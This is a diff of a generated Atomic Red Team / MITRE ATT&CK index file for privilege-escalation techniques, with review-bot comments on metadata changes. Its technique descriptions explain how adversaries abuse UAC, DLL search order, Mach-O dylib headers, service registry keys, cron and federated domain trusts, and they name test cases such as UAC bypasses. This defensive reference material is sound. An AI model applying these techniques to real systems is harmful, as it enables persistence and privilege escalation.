x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.007:
technique:
@@ -33484,7 +33755,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -33572,7 +33842,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests:
- name: Append malicious start-process cmdlet
@@ -33695,7 +33964,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.006:
technique:
@@ -33727,7 +33995,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -33750,11 +34018,10 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -33812,9 +34079,8 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests:
- name: ListCronjobs
@@ -33888,7 +34154,7 @@ privilege-escalation:
elevation_required: false
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -33989,7 +34255,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests:
- name: Bypass UAC using Event Viewer (cmd)
@@ -34690,7 +34955,7 @@ privilege-escalation:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -34724,8 +34989,6 @@ privilege-escalation:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests:
- name: Sudo usage
@@ -34843,7 +35106,7 @@ privilege-escalation:
sudo visudo -c -f /usr/local/etc/sudoers
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -34862,7 +35125,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -34876,7 +35138,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -34903,8 +35164,8 @@ privilege-escalation:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -34935,7 +35196,8 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests:
- name: Service Registry Permissions Weakness
@@ -34999,7 +35261,7 @@ privilege-escalation:
name: command_prompt
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -35071,9 +35333,9 @@ privilege-escalation:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -35089,7 +35351,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests:
- name: Add a driver
@@ -35159,7 +35420,7 @@ privilege-escalation:
elevation_required: true
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -35234,7 +35495,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests:
- name: HKLM - Add atomic_test key to launch executable as part of user setup
@@ -35307,7 +35567,7 @@ privilege-escalation:
elevation_required: true
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -35327,9 +35587,14 @@ privilege-escalation:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
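Review bot: the folded double-quoted description now wraps `(Citation:` and `Okta Cross-Tenant Impersonation 2023)` across two lines; YAML joins folded lines of a double-quoted scalar with a single space, so the citation token is reconstructed intact, but please re-run the generator's YAML load (or `yamllint`) rather than trusting the eye here. The added AWS sentence states that a new identity provider on an AWS Organization lets the adversary federate into all member accounts without per-account identities; that is the security-relevant point of this change and it matches the cited RE:Inforce 2024 talk, but note the existing data sources for this technique remain `Command: Command Execution` and `Application Log: Application Log Content`, so the detection guidance does not yet mention the IAM Identity Center / organization-level configuration events a defender would actually watch for. That is an upstream ATT&CK gap, not something to hand-edit in this generated file, but worth flagging for anyone writing an atomic against this new text.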
@@ -35349,9 +35614,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
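Review bot: the platform list for T1484.002 replaces `Azure AD` and `SaaS` with the single `Identity Provider` value and bumps the version to 2.1, which is the ATT&CK v16 platform consolidation. Anything downstream that keys on the old platform strings (per-platform index CSVs, filters in the Invoke-AtomicRedTeam platform lists, docs that enumerate supported platforms) needs the same rename in this change set or the technique silently drops out of those views; please confirm the per-platform indexes are regenerated in the same commit.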
@@ -35368,6 +35632,10 @@ privilege-escalation:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -35401,7 +35669,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests:
- name: Add Federation to Azure AD
@@ -35653,7 +35920,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests:
- name: Modify Fax service to run PowerShell
@@ -35865,26 +36131,7 @@ privilege-escalation:
elevation_required: true
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -35901,6 +36148,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -35911,9 +36159,13 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -35921,8 +36173,24 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests:
- name: Cron - Replace crontab with referenced file
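Review bot: the fields removed at the top of the T1053.003 block (`id`, `created`, `created_by_ref`, `external_references`, `object_marking_refs`, `type`) all reappear here with identical values (`attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c`, `created: '2019-12-03T14:25:00.538Z'`, the same SentinelOne reference), so this is a key reorder plus the new `revoked: false`, `x_mitre_remote_support: false`, `x_mitre_deprecated: false` and the 3.2.0 spec version, not a content change. A reviewer diffing this by hand would be helped by a note that the generator now emits keys in upstream order; otherwise the large delete/insert pair looks like the technique was rewritten.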
@@ -36041,7 +36309,7 @@ privilege-escalation:
'
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -36071,6 +36339,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -36081,6 +36350,7 @@ privilege-escalation:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -36089,13 +36359,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -36137,9 +36407,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests:
- name: Azure AD - Add Company Administrator Role to a user
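Review bot: the three metadata lines removed here (`x_mitre_attack_spec_version`, `x_mitre_modified_by_ref`, `spec_version`) are the ones re-added higher up in the T1098.003 block, so nothing is lost. One thing to carry as a follow-up rather than fix in this generated file: the platform list above now reads `Office Suite` / `Identity Provider`, while the first atomic test is still named `Azure AD - Add Company Administrator Role to a user`. The test name is a product name and can stay, but the test metadata (its `supported_platforms`) should be checked against the new platform vocabulary so the index and the atomic agree on where it runs.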
@@ -36330,7 +36597,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests:
- name: Print Processors
@@ -36370,14 +36636,14 @@ privilege-escalation:
elevation_required: true
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -36393,8 +36659,8 @@ privilege-escalation:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -36408,7 +36674,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -36434,6 +36700,10 @@ privilege-escalation:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
@@ -36461,7 +36731,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests:
- name: DLL Search Order Hijacking - amsi.dll
@@ -36530,7 +36799,7 @@ privilege-escalation:
elevation_required: true
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -36556,7 +36825,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -36598,7 +36867,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -36676,11 +36944,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -36760,7 +37027,77 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.003:
technique:
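Review bot: T1098.007 (Additional Local or Domain Groups) is added with `atomic_tests: []` and an empty `x_mitre_detection`, so this entry is metadata only for now; fine for an index regen, but the description already names the concrete actions an atomic would exercise (`net localgroup` / `net group` on Windows, `usermod` on Linux, membership in the local Administrators and Remote Desktop Users groups, and machine accounts added to domain groups), and `User Account: User Account Modification` is the single data source, so a follow-up issue to author tests for it would be appropriate. One upstream wording caveat worth noting for whoever writes those tests: the description says accounts may be added to "the sudoers group" on Linux; the administrative group is typically `sudo` or `wheel` depending on distribution (sudoers is the file), so a test should parameterise the group name rather than hard-code "sudoers". Also check that the preceding `+ atomic_tests: []` line really belongs to T1053 (it replaces the `spec_version` line removed just above it and the old trailing `atomic_tests: []` is now consumed by T1098.007); a YAML load confirming T1053 still has an empty `atomic_tests` list would settle it.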
@@ -36783,7 +37120,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -36831,8 +37168,6 @@ privilege-escalation:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
